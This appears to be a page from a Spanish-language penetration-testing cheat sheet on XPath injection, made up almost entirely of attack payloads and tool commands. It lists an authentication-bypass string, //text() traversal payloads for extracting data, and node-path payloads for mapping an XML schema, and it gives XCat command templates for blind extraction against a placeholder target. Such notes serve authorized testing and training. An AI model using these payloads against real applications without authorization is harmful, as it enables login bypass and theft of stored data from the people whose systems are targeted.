XPath injection

XML Path Language (XPath) injection

Identificación

Authentication bypass

Data exfiltration

invalid') or ('1'='1
 | //text()
..//text()
../..//text()
../../..//text()
../../../..//text()
../../../../..//text()
1234 or contains(.,'<text-to-search>')

Schema depth

| /*[1]
| /*[1]/*[1]
| /*[1]/*[2]
| /*[1]/*[3]
| /*[1]/*[1]/*[1]
| /*[1]/*[1]/*[2]
| /*[1]/*[1]/*[3]
| /*[1]/*[2]/*[1]
| /*[1]/*[2]/*[2]
| /*[1]/*[2]/*[3]
| /*[1]/*[3]/*[1]
| /*[1]/*[3]/*[2]
| /*[1]/*[3]/*[3]

Blind

Herramientas

XCat

Especificar al parámetro vulnerable (<vulnerable-param>) un valor de muestra que conduzca a un resultado positivo (<true-condition>).

# GET
xcat run -m GET http://<target>/index.php <vulnerable-param> <param1>=<value1> <param2>=<value2> --true-string=<true-condition> --headers=<headers.txt>
# POST
xcat run -m POST http://<target>/index.php <vulnerable-param> <param1>=<value1> <param2>=<value2> --true-string=<true-condition> --encode=form --headers=<headers.txt>
AnteriorXML external entity (XXE) injectionSiguienteLDAP injection

Última actualización